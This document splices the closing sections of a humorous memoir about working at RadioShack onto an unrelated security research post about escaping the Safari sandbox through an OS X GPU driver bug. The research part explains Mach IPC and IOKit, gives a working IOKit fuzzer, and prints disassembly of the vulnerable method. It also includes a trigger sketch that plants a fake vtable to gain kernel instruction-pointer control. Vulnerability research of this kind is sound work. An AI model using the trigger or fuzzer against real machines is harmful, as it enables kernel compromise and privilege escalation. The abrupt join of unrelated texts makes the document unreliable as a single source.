This is a consumer technology business that is built to work perfectly in the year 1975. The Internet comes around, and this, being a technology company, is expected to move on it aggressively and know what it's doing, except basically nobody really understood the Internet for a very long time. So they whiffed big a few times. Then the iPhone came around and rendered half the stuff RadioShack sold completely redundant. This company needed to become something radically different a decade ago. I just don't think it knows how to be anything else.

It's like retracing the steps and doings of a drunk person: okay, here's where he keyed the cop car. Wait, why'd he do that? I don't know, but his pants are lying here, so this is before he stripped naked and tried to rob the library.

XVII.

Working at RadioShack was sort of the worst of two worlds: there was the poverty-level income of a blue-collar retail job, coupled with the expectations, political nonsense, and corporate soullessness of the white-collar environment.

At least once a month, often on our days off, we were expected to show up, in dress code, to the district office for a two-hour meeting. Sometimes we'd be individually picked out and shamed as people whose sales numbers weren't good enough. I still remember a woman crying in front of everyone and leaving in embarrassment.

We were also shown videos from the corporate office in Fort Worth. One skit stands out in particular. Four of RadioShack's regional executives were sitting at a poker table, "betting" on which of their regions would perform best in Q3.

Midwest executive: I'm betting that my region leads sales this quarter.
Northeast executive: You know what? My sales associates know they need to offer DirecTV and Sprint to every customer who walks in the door. I will call you ... and raise you. [shoves stack of chips to middle of table]

(Note: that is a string bet, you dingdong.)

Southwest executive: Well, my sales associates know they must sell H.O.T. the A.A.A. way! I raise!
Northwest executive: When it comes to my sales associates ... [pushes enormous stack of chips] ... I'm allllll in.

We were supposed to watch this and take pride in our thousand-store region and be motivated to, I don't know, earn bonuses for these executives? We, the people taking home a thousand bucks a month, who go to work with holes in our last pairs of khakis, who walk an hour to work every day because we can't afford car repairs, who managed a store for 80 hours last week and received a figure below minimum wage for the trouble. We, who are scuttling our only day off so we can sit here and hear about the money they want to make and how useless we are.

It's fair to ask me why I worked there for so long. I just couldn't find a job I thought was better, and tried to convince myself in the moment that it wasn't so bad.

XVIII.

I said that a lot of working at RadioShack felt like guard duty. One week, it was actual guard duty: a RadioShack in a stone-dead mall was scheduled to close in a week, and all its employees had already bailed, so they sent me there to manage it for a few days.

The first day, I opened the store for 12 hours, and not a single person walked in. The second day, a guy bought a watch battery, and the store revenue for the week upped to $2.99. It didn't take me long to pull out the desk chair from the back room, have a seat in the middle of the store, rewire the display TVs, and watch MacGyver on satellite.

And it's true that I was making pennies above minimum wage, but it's also true that my job was to go to a building, turn on the lights, sit there, be the boss of myself, watch a shitload of MacGyver, and go home. MacGyver is an awesome show and I will never have a better week of work than that one.

On the second-to-last day there, I left the store empty for 30 seconds so I could use the bathroom, and within those 30 seconds, someone sprinted in and straight-up stole the cash drawer and the $300 inside of it. In a panic, I called the district office to let them know.

Their response, more or less, was, "eh, whatever." Damn it, I could have just taken it myself. I could have given myself a $300 raise for watching the dang MacGyver.

If that thief counts as a customer, I had two customers that week.

XIX.

Me. Thanks for calling RadioShack, this is Jon. How may I help you?
Old man. Jon, is it?
Me. Yep.
Old man. Well, I got a joke for you, would you like to hear it?
Me. Sure.
Old man. Well, they call it the World Wide Web, is that right?
Me. They do.
Old man. Now, would that make Bill Gates the spider?
Me. I guess it would!
Old man. Well, that's all. I just thought of that joke, and I thought, "who might get a kick out of that?" And I figured y'all at the RadioShack would get a kick out of it.
Me. I loved it.
Old man. Take care now.

That wonderful old man, to this day, is one of my chief comedic inspirations. God bless him.

* * *

On Thanksgiving, the people of RadioShack will be working for a company that has, perhaps, finally run out of new ways to make them sad. They are people who RadioShack never deserved. People who, God willing, will go on to find a job better than this one.

I bet RadioShack was great once. I can't look through their decades-old catalogs and come away with any other impression. They sold giant walnut-wood speakers I'd kill to have today. They sold computers back when people were trying to understand what they were. When I was a little kid, going to RadioShack was better than going to the toy store. It was the toy store for tall people.

By the time I got tall and worked there, RadioShack had already begun to die, I think. It failed exotically, with great flourishes, on canvases large and small, and in ways previously unimagined, taking pause only to kick around the souls who kept it alive. It doesn't have me to kick around anymore, and soon, it won't have anyone.

Damn. I mean, Thanksgiving. Y'all just had to get one last shot in, didn't you?

Images found via RadioShackCatalogs.com, which is one hell of a site to look through in the year 2014.

Escaping the Safari sandbox with a kernel GPU bug

2 hours 34 min ago

Posted by Ian Beer



TL;DR

An OS X GPU driver trusted a user-supplied kernel C++ object pointer and called a virtual function. The IOKit registry contained kernel pointers which were used to defeat kASLR. A kernel ROP payload ran Calculator.app as root using a convenient kernel API.

Overview of part I

We finished part I with the ability to load our own native library into the Safari renderer process on OS X by exploiting an integer truncation bug in the Safari javascript engine. Here in part II we’ll take a look at how sandboxing works on OS X, revise some OS X fundamentals and then exploit two kernel bugs to launch Calculator.app running as root from inside the Safari sandbox.

Safari process model

Safari’s sandboxing model is based on privilege separation. It uses the WebKit2 framework to communicate between multiple separate processes which collectively form the Safari browser. Each of these processes is responsible for a different part of the browser and sandboxed to only allow access to the system resources it requires.

Specifically Safari is split into four distinct process families:

  • WebProcesses are the renderers - they’re responsible for actually drawing web pages as well as dealing with most active web content such as javascript

  • NetworkProcess is the process which talks to the network

  • PluginProcesses are the processes which host native plugins like Adobe Flash

  • UIProcess is the unsandboxed parent of all the other processes and is responsible for coordinating their activity such that a webpage the user can interact with is actually displayed

The Web, Network and Plugin process families are sandboxed. In order to understand how to break out of the WebProcess that we find ourselves in we’ve first got to understand how this sandbox is implemented.

OS X sandboxing primitives

OS X uses the Mandatory Access Control (MAC) paradigm to implement sandboxing; specifically, it uses the TrustedBSD framework. Use of the MAC sandboxing paradigm implies that whenever a sandboxed process tries to acquire access to some system resource, for example by opening a file or creating a network socket, the OS will first check: does this particular process have the right to do this?

An implementation of sandboxing using TrustedBSD has two parts: firstly, hooks must be added to the kernel code wherever a sandboxing decision is required. A TrustedBSD hook looks like this:

/* bsd/kern/uipc_syscalls.c */
int socket(struct proc *p, struct socket_args *uap, int32_t *retval)
{
#if CONFIG_MACF_SOCKET_SUBSET
    if ((error = mac_socket_check_create(kauth_cred_get(), uap->domain,
            uap->type, uap->protocol)) != 0)
        return (error);
#endif /* MAC_SOCKET_SUBSET */
...

That snippet of code is from the implementation of the socket syscall on OS X. If MAC support has been enabled at compile time then the very first thing the socket syscall implementation will do is call mac_socket_check_create, passing the credentials of the calling process and the domain, type and protocol of the requested socket:

/* security/mac_socket.h */
int mac_socket_check_create(kauth_cred_t cred, int domain, int type, int protocol)
{
    int error;

    if (!mac_socket_enforce)
        return 0;
    MAC_CHECK(socket_check_create, cred, domain, type, protocol);
    return (error);
}

Here we see that if the enforcement of MAC on sockets hasn’t been globally disabled (mac_socket_enforce is a variable exposed by the sysctl interface) then this function falls through to the MAC_CHECK macro:

/* security/mac_internal.h */
#define MAC_CHECK(check, args...) do {                          \
    for (i = 0; i < mac_policy_list.staticmax; i++) {           \
        mpc = mac_policy_list.entries[i].mpc;                   \
        ...                                                     \
        if (mpc->mpc_ops->mpo_ ## check != NULL)                \
            error = mac_error_select(                           \
                mpc->mpc_ops->mpo_ ## check (args),             \
                error);

This macro is the core of TrustedBSD: it walks mac_policy_list.entries, the list of registered policies, and the mpo_ ## check call is TrustedBSD consulting each policy. In actual fact a policy is nothing more than a C struct (struct mac_policy_ops) containing function pointers (one per hook type), and consulting a policy simply means calling the right function pointer in that struct.

If that policy function returns 0 (or isn’t implemented at all by the policy) then the MAC check succeeds. If the policy function returns a non-zero value then the MAC check fails and, in the case of this socket hook, the syscall will fail passing the error code back up to userspace and the rest of the socket syscall won’t be executed.

The second part of an implementation of sandboxing using TrustedBSD is the provision of these policy modules. Although TrustedBSD allows multiple policy modules to be present at the same time, in practice on OS X there's only one, and it's implemented in its own kernel extension: Sandbox.kext. When it's loaded, Sandbox.kext registers itself as a policy with TrustedBSD by passing a pointer to its mac_policy_ops structure. TrustedBSD adds this to the mac_policy_list.entries array seen earlier and will then call into Sandbox.kext whenever a sandboxing decision is required.
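To make that registration concrete, here's a minimal sketch of a TrustedBSD policy module. This is not Sandbox.kext's code: the policy name, the hook body and the kext entry point are all hypothetical, and only the registration pattern is the point.

#include <sys/socket.h>
#include <sys/errno.h>
#include <mach/kmod.h>
#include <security/mac_policy.h>

/* Hypothetical hook: fail AF_INET socket creation, allow everything else.
   Returning non-zero from a hook fails the corresponding MAC check. */
static int my_socket_check_create(kauth_cred_t cred, int domain, int type, int protocol)
{
    return (domain == AF_INET) ? EPERM : 0;
}

static struct mac_policy_ops my_ops = {
    .mpo_socket_check_create = my_socket_check_create,
};

static struct mac_policy_conf my_conf = {
    .mpc_name           = "my_policy",
    .mpc_fullname       = "Example MAC policy",
    .mpc_ops            = &my_ops,
    .mpc_loadtime_flags = MPC_LOADTIME_FLAG_UNLOADOK,
};

static mac_policy_handle_t my_handle;

kern_return_t my_policy_start(kmod_info_t *ki, void *d)
{
    /* Adds &my_conf to mac_policy_list: the same step Sandbox.kext performs. */
    return mac_policy_register(&my_conf, &my_handle, d) ? KERN_FAILURE : KERN_SUCCESS;
}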

Sandbox.kext and the OS X sandbox policy_ops

This paper from Dionysus Blazakis, this talk from Meder Kydyraliev and this reference from @osxreverser go into great detail about Sandbox.kext and its operation and usage.

Summarizing those linked resources, every process can have a unique sandbox profile. For (almost) every MAC hook type Sandbox.kext allows a sandbox profile to specify a decision tree to be used to determine whether the MAC check should pass or fail. This decision tree is expressed in a simple scheme-like DSL built from tuples of actions, operations and filters (for a more complete guide to the syntax refer to the linked docs):

(action operation filter)



  • Actions determine whether a particular rule corresponds to passing or failing the MAC check. Actions are the literals allow and deny.
  • Operations define which MAC hooks this rule applies to. For example the file-read operation allows restricting read access to files.
  • Filters allow a more granular application of operations, for example a filter applied to the file-read operation could define a specific file which is or isn’t allowed.

Here’s a snippet from the WebProcess sandbox profile to illustrate that:

(deny default (with partial-symbolication))
...
(allow file-read*
    ;; Basic system paths
    (subpath "/Library/Dictionaries")
    (subpath "/Library/Fonts")
    (subpath "/Library/Frameworks")
    (subpath "/Library/Managed Preferences")
    (subpath "/Library/Speech/Synthesizers")
    (regex #"^/private/etc/(hosts|group|passwd)$")
...
)

As you can see, sandbox profiles are very readable on OS X. It's usually quite clear what any particular profile allows and denies. In this example the profile is using regular expressions to define allowed file paths (there's a small regex matching engine in the kernel in AppleMatch.kext).

Sandbox.kext also has a mechanism which allows userspace programs to ask for policy decisions. The main use of this is to restrict access to system IPC services, access to which isn’t mediated by the kernel (so there’s nowhere to put a MAC hook) but by the userspace daemon launchd.
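The userspace side of this is the private sandbox_check() API from libsandbox. The prototype and the filter-type constant below are reconstructed from public reverse-engineering work, so treat them as assumptions; the pattern, though, is how a daemon like launchd asks Sandbox.kext whether a process may, say, look up a particular mach service:

#include <stdio.h>
#include <unistd.h>

/* Private API from libsandbox -- this prototype is an assumption, not from the SDK. */
extern int sandbox_check(pid_t pid, const char *operation, int filter_type, ...);

int main(void)
{
    /* Ask whether this process may look up the (example) service name below.
       filter_type 1 is assumed to mean "filter by name". */
    int denied = sandbox_check(getpid(), "mach-lookup", 1,
                               "com.apple.windowserver");
    printf("mach-lookup: %s\n", denied ? "denied" : "allowed");
    return 0;
}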

Enumerating the attack surface of a sandboxed process

Broadly speaking there are two aspects to consider when enumerating the attack surface reachable from within a particular sandbox on OS X:


  • Actions which are specifically allowed by the sandbox policy - these are easy to enumerate by looking at the sandbox policy files.

  • Those actions which are allowed either because the Sandbox.kext policy_ops doesn't implement the hook callback or because there's no hook in place at all.

The Safari WebProcess sandbox profile is located here:

/System/Library/StagedFrameworks/Safari/WebKit.framework/Versions/A/Resources/com.apple.WebProcess.sb

This profile uses an import statement to load the contents of /System/Library/Sandbox/Profiles/system.sb, which uses the define statement to declare various broad sandboxing rulesets; these define all the rules required to use complete OS X subsystems such as graphics or networking. Amongst others, the WebProcess.sb profile uses (system-graphics), which is defined in system.sb:

(define (system-graphics)
  ...
  (allow iokit-open
         (iokit-connection "IOAccelerator")
         (iokit-user-client-class "IOAccelerationUserClient")
         (iokit-user-client-class "IOSurfaceRootUserClient")
         (iokit-user-client-class "IOSurfaceSendRight"))
)

This tells us that the WebProcess sandbox has pretty much unrestricted access to the GPU drivers. In order to understand what the iokit-user-client-class actually means and what this gives us access to we have to step back and take a look at the various parts of OS X involved in the operation of device drivers.


OS X kernel fundamentals

There are two great books I’d recommend to learn more about the OS X kernel: the older but still relevant “Mac OS X Internals” by Amit Singh and the more recent “Mac OS X and iOS Internals: To the Apple’s Core” by Jonathan Levin.
The OS X wikipedia article contains a detailed taxonomic discussion of OS X and its place in the UNIX phylogenetic tree but for our purposes it’s sufficient to divide the OS X kernel into three broad subsystems which collectively are known as XNU:
BSD

The majority of OS X syscalls are BSD syscalls. The BSD-derived code is responsible for things like file systems and networking.
Mach

Originally a research microkernel from CMU, Mach is responsible for many of the low-level idiosyncrasies of OS X. The mach IPC mechanism is one of the most fundamental parts of OS X, but the mach kernel code is also responsible for things like virtual memory management.
Mach only has a handful of dedicated mach syscalls (mach calls them traps) and almost all of these only exist to support the mach IPC system. All further interaction with the mach kernel subsystems from userspace is via mach IPC.
IOKit

IOKit is the framework used for writing device drivers on OS X. IOKit code is written in C++ which brings with it a whole host of new bug classes and exploitation possibilities. We'll return to a more detailed discussion of IOKit later.

Mach IPC

If you want to change the permissions of a memory mapping in your process, talk to a device driver, render a system font, symbolize a crash dump, debug another process or determine the current network connectivity status then on OS X behind the scenes you’re really sending and receiving mach messages. In order to find and exploit bugs in all those things it’s important to understand how mach IPC works:

Messages, ports and queues

Mach terminology can be a little unclear at times and OS X doesn’t ship with the man pages for the mach APIs (but you can view them online here.)

Fundamentally, mach IPC is a message-oriented protocol. The messages sent via mach IPC are known as mach messages. Sending a mach message really means the message gets enqueued into a kernel-maintained message queue known as a mach port.

Only one process can dequeue messages from a particular port. In mach terminology this process has a receive-right for the port. Multiple processes can enqueue messages to a port - these processes hold send-rights to that port.

Within a process these send and receive rights are called mach port names. A mach port name is used to index a per-process mapping between mach port names and message queues (akin to how a process-local UNIX file descriptor maps to an actual file):


In this diagram we can see that the process with PID 123 has a mach port name 0xabc. It’s important to notice that this Mach port name only has a meaning within this process - we can see that in the kernel structure for this process 0xabc is just a key which maps to a pointer to a message queue.

When the process with PID 456 tries to dequeue a message using the mach port name 0xdef the kernel uses 0xdef to index that process’s map of mach ports such that it can find the correct message queue from which to dequeue a message.

Mach messages

A single mach message can have up to four parts:

  • Message header - this header is mandatory and specifies the port name to send the message to as well as various flags.

  • Kernel processed descriptors - this optional section can contain multiple descriptors which are parts of the message which need to be interpreted by the kernel.

  • Inline data - this is the inline binary payload.

  • Audit trailer - The message receiver can request that the kernel append an audit trailer to received messages.


When a simple mach message containing no descriptors is sent it will first be copied entirely into a heap-allocated buffer in the kernel. A pointer to that copy is then appended to the correct mach message queue, and when the process with a receive right to that queue dequeues that message the kernel copy gets copied into the receiving process.
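Here's a minimal, self-contained sketch of that round trip within a single process: allocate a receive right, give ourselves a send right, enqueue a message and dequeue it again. The payload layout is arbitrary; everything else is the standard mach_msg API.

#include <mach/mach.h>
#include <stdio.h>
#include <string.h>

typedef struct {
    mach_msg_header_t header;
    char payload[32];                 /* inline data */
} simple_msg_t;

int main(void)
{
    mach_port_t port;
    /* Create a receive right, then add a send right under the same name. */
    mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &port);
    mach_port_insert_right(mach_task_self(), port, port, MACH_MSG_TYPE_MAKE_SEND);

    simple_msg_t msg = {0};
    msg.header.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, 0);
    msg.header.msgh_size = sizeof(msg);
    msg.header.msgh_remote_port = port;       /* destination queue */
    strcpy(msg.payload, "hello, queue");

    /* Enqueue: the kernel copies the message into a kernel buffer. */
    mach_msg(&msg.header, MACH_SEND_MSG, sizeof(msg), 0,
             MACH_PORT_NULL, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);

    /* Dequeue: the kernel copy is copied back out to the receiver. */
    struct { simple_msg_t m; mach_msg_trailer_t t; } rcv;
    mach_msg(&rcv.m.header, MACH_RCV_MSG, 0, sizeof(rcv),
             port, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
    printf("received: %s\n", rcv.m.payload);
    return 0;
}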

Out-of-line memory

Copying messages into and out of the kernel is slow, especially if the messages are large. In order to send large amounts of data you can use the "out-of-line memory" descriptor. This enables the message sender to instruct the kernel to map a copy-on-write virtual memory copy of a buffer into the receiver process when the message is dequeued.

Bi-directional messages

Mach IPC is fundamentally uni-directional. In order to build a two-way IPC mechanism mach IPC allows for messages to carry port rights. In a mach message, along with binary data you can also send a mach port right.

Mach IPC is quite flexible when it comes to sending port rights to other processes. You can use the local_port field of the mach message header, use a port descriptor or use an OOL-ports descriptor. There are a multitude of flags to control exactly what rights should be transferred, or if new rights should be created during the send operation (it’s common to use the MAKE_SEND flag which creates and sends a new send right to a port which you hold the receive right for.)

Bootstrapping Mach IPC

There’s a fundamental bootstrapping problem with mach IPC: how do you get a send right to a port for which another process has a receive right without first sending them a message (thus encountering the same problem in reverse.)

One way around this could be to allow mach ports to be inherited across a fork() akin to setting up a pipe between a parent and child process using socketpair(). However, unlike file descriptors, mach port rights are not inherited across a fork so you can’t implement such a system.

Except, some mach ports are inherited across a fork! These are the special mach ports, one of which is the bootstrap port. The parent of all processes on OS X is launchd, and one of its roles is to set the default bootstrap port which will then be inherited by every child.

Launchd

Launchd holds the receive-right to this bootstrap port and plays the role of the bootstrap server, allowing processes to advertise named send-rights which other processes can look up. These are OS X Mach IPC services.
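Looking up such a named service is a one-liner against the inherited bootstrap port. A small sketch; the service name is just an example of a name launchd typically knows about:

#include <mach/mach.h>
#include <servers/bootstrap.h>
#include <stdio.h>

int main(void)
{
    mach_port_t service = MACH_PORT_NULL;
    /* bootstrap_port is the special port every process inherits from launchd. */
    kern_return_t kr = bootstrap_look_up(bootstrap_port,
                                         "com.apple.system.notification_center",
                                         &service);
    if (kr == KERN_SUCCESS)
        printf("got a send right: 0x%x\n", service);
    else
        printf("lookup failed: %s\n", bootstrap_strerror(kr));
    return 0;
}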

MIG

We’re now at the point where we can see how the kernel and userspace Mach IPC systems use a few hacks to get bootstrapped such that they’re able to send binary data. This is all that you get with raw Mach IPC.


MIG is the Mach Interface Generator and it provides a simple RPC (remote procedure call) layer on top of the raw mach message IPC. MIG is used by all the Mach kernel services and many userspace services.

MIG interfaces are declared in .defs files. These use a simple Interface Definition Language which can define function prototypes and simple data structures. The MIG tool compiles the .defs into C code which implements all the required argument serialization/deserialization.

Calling a MIG RPC is completely transparent: it's just like calling a regular C function, and if you've ever programmed on a Mac you've almost certainly used a MIG generated header file.

IOKit

As mentioned earlier IOKit is the framework and kernel subsystem used for device drivers. All interactions with IOKit begin with the IOKit master port. This is another special mach port which allows access to the IOKit registry. devices.defs is the relevant MIG definition file. The Apple developer documentation describes the IOKit registry in great detail.
The IOKit registry allows userspace programs to find out about available hardware. Furthermore, device drivers can expose an interface to userspace by implementing a UserClient.
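In code, getting hold of a UserClient looks like the sketch below: find a service in the registry by class name, then ask the driver to instantiate a UserClient for us. The class name "IntelAccelerator" and the connect type 1 are assumptions for illustration; the right values depend on the driver:

#include <IOKit/IOKitLib.h>
#include <stdio.h>

int main(void)
{
    /* Look up a driver in the IOKit registry by class name. */
    io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault,
                               IOServiceMatching("IntelAccelerator"));
    if (service == IO_OBJECT_NULL) {
        printf("service not found\n");
        return 1;
    }
    /* Ask the driver to create a UserClient; the type selects which
       UserClient subclass gets instantiated. */
    io_connect_t conn = IO_OBJECT_NULL;
    kern_return_t kr = IOServiceOpen(service, mach_task_self(), 1, &conn);
    printf("IOServiceOpen: 0x%x, connection: 0x%x\n", kr, conn);
    return 0;
}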

The main way in which userspace actually interacts with an IOKit driver's UserClient is via the io_connect_method MIG RPC:

type io_scalar_inband64_t = array[*:16] of uint64_t;
type io_struct_inband_t   = array[*:4096] of char;

routine io_connect_method(
    connection            : io_connect_t;
    in    selector        : uint32_t;

    in    scalar_input    : io_scalar_inband64_t;
    in    inband_input    : io_struct_inband_t;
    in    ool_input       : mach_vm_address_t;
    in    ool_input_size  : mach_vm_size_t;

    out   inband_output   : io_struct_inband_t, CountInOut;
    out   scalar_output   : io_scalar_inband64_t, CountInOut;
    in    ool_output      : mach_vm_address_t;
    inout ool_output_size : mach_vm_size_t
);

This method is wrapped by the IOKitUser library function IOConnectCallMethod.
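As a sketch of the userspace side, here's what a call to external method 0 of an open connection might look like; the selector, argument counts and sizes are made up and depend entirely on the driver:

#include <IOKit/IOKitLib.h>

kern_return_t call_method_zero(io_connect_t conn)
{
    uint64_t scalars_in[2] = { 1, 2 };
    uint8_t  struct_in[16] = { 0 };
    uint64_t scalar_out = 0;
    uint32_t scalar_out_cnt = 1;     /* CountInOut: capacity in, actual count out */

    return IOConnectCallMethod(conn,
                               0,                            /* selector */
                               scalars_in, 2,                /* scalar input */
                               struct_in, sizeof(struct_in), /* struct input */
                               &scalar_out, &scalar_out_cnt, /* scalar output */
                               NULL, NULL);                  /* no struct output */
}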

The kernel implementation of this MIG API is the function is_io_connect_method in IOUserClient.cpp:

kern_return_t is_io_connect_method
    (
    io_connect_t connection,
    uint32_t selector,
    io_scalar_inband64_t scalar_input,
    mach_msg_type_number_t scalar_inputCnt,
    io_struct_inband_t inband_input,
    mach_msg_type_number_t inband_inputCnt,
    mach_vm_address_t ool_input,
    mach_vm_size_t ool_input_size,
    io_struct_inband_t inband_output,
    mach_msg_type_number_t *inband_outputCnt,
    io_scalar_inband64_t scalar_output,
    mach_msg_type_number_t *scalar_outputCnt,
    mach_vm_address_t ool_output,
    mach_vm_size_t *ool_output_size
    )
{
    CHECK( IOUserClient, connection, client );

    IOExternalMethodArguments args;
...
    args.selector = selector;

    args.scalarInput = scalar_input;
    args.scalarInputCount = scalar_inputCnt;
    args.structureInput = inband_input;
    args.structureInputSize = inband_inputCnt;
...
    args.scalarOutput = scalar_output;
    args.scalarOutputCount = *scalar_outputCnt;
    args.structureOutput = inband_output;
    args.structureOutputSize = *inband_outputCnt;
...
    ret = client->externalMethod( selector, &args );

Here we can see that the code fills in an IOExternalMethodArguments structure from the arguments passed to the MIG RPC and then calls the ::externalMethod method of the IOUserClient.

What happens next depends on the structure of the driver's IOUserClient subclass. If the driver overrides externalMethod then this calls straight into driver code. Typically the selector argument to IOConnectCallMethod would be used to determine what function to call, but if the subclass overrides externalMethod it's free to implement whatever method dispatch mechanism it wants. However, if the driver subclass doesn't override externalMethod, the IOUserClient implementation of it will call getTargetAndMethodForIndex, passing the selector argument. This is the method which most IOUserClient subclasses override; it returns a pointer to an IOExternalMethod structure:

struct IOExternalMethod {
    IOService *  object;
    IOMethod     func;
    IOOptionBits flags;
    IOByteCount  count0;
    IOByteCount  count1;
};


Most drivers have a simple implementation of getTargetAndMethodForIndex which uses the selector argument to index an array of IOExternalMethod structures. This structure contains a pointer to the method to be invoked (and since this is C++ this isn't actually a function pointer but a pointer-to-member-method, which means things can get very fun when you get to control it! See the bug report for CVE-2014-1379 in the Project Zero bugtracker for an example of this.)

The flags member is used to define what mixture of input and output types the ExternalMethod supports and the count0 and count1 fields define the number or size in bytes of the input and output arguments. There are various shim functions which make sure that func is called with the correct prototype depending on the declared number and type of arguments.
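Put together, the typical driver-side pattern looks something like the sketch below. The class MyUserClient, its method and its input struct are hypothetical (their declarations are elided); the IOExternalMethod table and the *target assignment are the standard shape:

#include <IOKit/IOUserClient.h>

/* MyUserClient is a hypothetical IOUserClient subclass. */
struct MyInStruct { uint64_t value; };

IOExternalMethod *MyUserClient::getTargetAndMethodForIndex(IOService **target,
                                                           UInt32 index)
{
    static const IOExternalMethod sMethods[] = {
        /* object, func (a pointer-to-member!), flags, count0, count1 */
        { NULL, (IOMethod) &MyUserClient::myMethod,
          kIOUCStructIStructO, sizeof(MyInStruct), 0 },
    };
    if (index >= sizeof(sMethods) / sizeof(sMethods[0]))
        return NULL;                  /* unknown selector */
    *target = this;                   /* the object the shim invokes func on */
    return (IOExternalMethod *) &sMethods[index];
}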

Putting all that together

At this point we know that when we call IOConnectCallMethod what really happens is that C code auto-generated by MIG serializes all the arguments into a data buffer which is wrapped in a mach message which is sent to a mach port we received from the IOKit registry, which we knew how to talk to because every process has a special device port. That message gets copied into the kernel where more MIG generated C code deserializes it and calls is_io_connect_method, which calls the driver's externalMethod virtual method.

Writing an IOKit fuzzer

When auditing code it's often worth writing a fuzzer alongside manual analysis. As soon as you've understood where attacker-controlled data could enter a system you can write a simple piece of code to throw randomness at it. As your knowledge of the code improves you can make incremental improvements to the fuzzer, allowing it to explore the code more deeply.


IOConnectCallMethod is the perfect example of an API where this applies. It's very easy to write a simple fuzzer to make random IOConnectCallMethod calls. One approach to slightly improve on pure randomness is to mutate real data - in this case, valid arguments to IOConnectCallMethod. Check out this talk from Chen Xiaobo and Xu Hao about how to do exactly that.

DYLD interposing

dyld is the OS X dynamic linker. Similar to LD_PRELOAD on Linux, dyld supports dynamic link-time interposition of functions. This means we can intercept function calls between different libraries and inspect and modify arguments.

Here’s the complete IOConnectCallMethod fuzzer interpose library I wrote for pwn4fun:

#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <time.h>
#include <IOKit/IOKitLib.h>

int maybe(){
  static int seeded = 0;
  if(!seeded){
    srand(time(NULL));
    seeded = 1;
  }
  return !(rand() % 100);
}

void flip_bit(void* buf, size_t len){
  if (!len)
    return;
  size_t offset = rand() % len;
  ((uint8_t*)buf)[offset] ^= (0x01 << (rand() % 8));
}

kern_return_t
fake_IOConnectCallMethod(
  mach_port_t connection,
  uint32_t    selector,
  uint64_t   *input,
  uint32_t    inputCnt,
  void       *inputStruct,
  size_t      inputStructCnt,
  uint64_t   *output,
  uint32_t   *outputCnt,
  void       *outputStruct,
  size_t     *outputStructCntP)
{
  if (maybe()){
    flip_bit(input, sizeof(*input) * inputCnt);
  }

  if (maybe()){
    flip_bit(inputStruct, inputStructCnt);
  }

  return IOConnectCallMethod(
    connection,
    selector,
    input,
    inputCnt,
    inputStruct,
    inputStructCnt,
    output,
    outputCnt,
    outputStruct,
    outputStructCntP);
}

typedef struct interposer {
  void* replacement;
  void* original;
} interpose_t;

__attribute__((used)) static const interpose_t interposers[]
  __attribute__((section("__DATA, __interpose"))) =
    {
      { .replacement = (void*)fake_IOConnectCallMethod,
        .original    = (void*)IOConnectCallMethod
      }
    };


Compile that as a dynamic library:

$ clang -Wall -dynamiclib -o flip.dylib flip.c -framework IOKit -arch i386 -arch x86_64

and load it:

$ DYLD_INSERT_LIBRARIES=./flip.dylib hello_world

1% of the time this will flip one bit in any struct input and scalar input to an IOKit external method. This was the fuzzer which found the bug used to get kernel instruction pointer control for pwn4fun, and it found it well before I had any clue how the Intel GPU driver worked at all.

IntelAccelerator bug

Running the fuzzer shown above with any program using the GPU led within seconds to a crash in the following method in the AppleIntelHD4000Graphics kernel extension, at the instruction at offset 0x8BAF:

IGAccelGLContext::unmap_user_memory( ;rdi == this
    IntelGLUnmapUserMemoryIn *,      ;rsi
    unsigned long long)              ;rdx

__text:8AD6
__text:8AD6 var_30 = qword ptr -30h
...
__text:8AED  cmp   rdx, 8
__text:8AF1  jnz   loc_8BFB
__text:8AF7  mov   rbx, [rsi]        ;rsi points to controlled data
__text:8AFA  mov   [rbp+var_30], rbx ;rbx completely controlled
...
__text:8BAB  mov   rbx, [rbp+var_30]
__text:8BAF  mov   rax, [rbx]        ;crash
__text:8BB2  mov   rdi, rbx
__text:8BB5  call  qword ptr [rax+140h]


Looking at the cross references to this function in IDA Pro we can see that unmap_user_memory is selector 0x201 of the IGAccelGLContext user client. This external method has one struct input, so on entry to this function rsi points to controlled data (and rdx contains the length of that struct input in bytes.)

At address 0x8af7 this function reads the first 8 bytes of the struct input as a qword and saves them in rbx. At this point rbx is completely controlled. This controlled value is then saved into the local variable var_30. Later, at 0x8bab, this value is read back into rbx, then at 0x8baf that controlled value is dereferenced without any checks, leading to a crash. If that dereference doesn't crash, however, then the qword value at offset 0x140 from the read value will be called.

In other words, this external method is treating the struct input bytes as containing a pointer to a C++ object and it's calling a virtual method of that object without checking whether the pointer is valid. Kernel space is just trusting that userspace will only ever pass a valid kernel object pointer. So by crafting a fake IOKit object and passing a pointer to it as the struct input of selector 0x201 of IGAccelGLContext we can get kernel instruction pointer control! Now what?
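Triggering the bug from userspace is then a few lines. A sketch, where conn is assumed to be an open IGAccelGLContext connection and pivot_gadget a kernel address we'll choose later:

#include <IOKit/IOKitLib.h>
#include <stdlib.h>

void trigger(io_connect_t conn, uint64_t pivot_gadget)
{
    /* Userspace pages are fine here since Mavericks lacks SMAP (see below). */
    uint64_t *fake_vtable = valloc(0x1000);
    uint64_t *fake_object = valloc(0x1000);

    fake_object[0] = (uint64_t) fake_vtable;   /* first qword: the vtable pointer */
    fake_vtable[0x140 / 8] = pivot_gadget;     /* the qword at [rax+0x140] gets called */

    uint64_t ptr = (uint64_t) fake_object;
    IOConnectCallMethod(conn, 0x201,           /* unmap_user_memory */
                        NULL, 0,               /* no scalar input */
                        &ptr, sizeof(ptr),     /* struct input must be exactly 8 bytes */
                        NULL, NULL, NULL, NULL);
}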

SMEP/SMAP

SMEP and SMAP are two CPU features designed to make exploitation of this type of bug trickier.

Mavericks supports Supervisor Mode Execute Prevention which means that when the processor is executing kernel code the CPU will fault if it tries to execute code on pages belonging to userspace. This prevents us from simply mapping an executable kernel shellcode payload at a known address in userspace and getting the kernel to jump to it.


The generic defeat for this mitigation is code-reuse (ROP). Rather than diverting execution directly to shellcode in userspace, we divert it to existing executable code in the kernel. By “pivoting” the stack pointer to controlled data we can easily chain together multiple code chunks and either turn off SMEP or execute an entire payload just in ROP.

The second generic mitigation supported at the CPU level is Supervisor Mode Access Prevention. As the name suggests this prevents kernel code from even reading user pages directly. This would mean we’d have to be able to get controlled data at a known location in kernel space for the fake IOKit object and the ROP stack since we wouldn’t be able to dereference userspace addresses, even to read them.

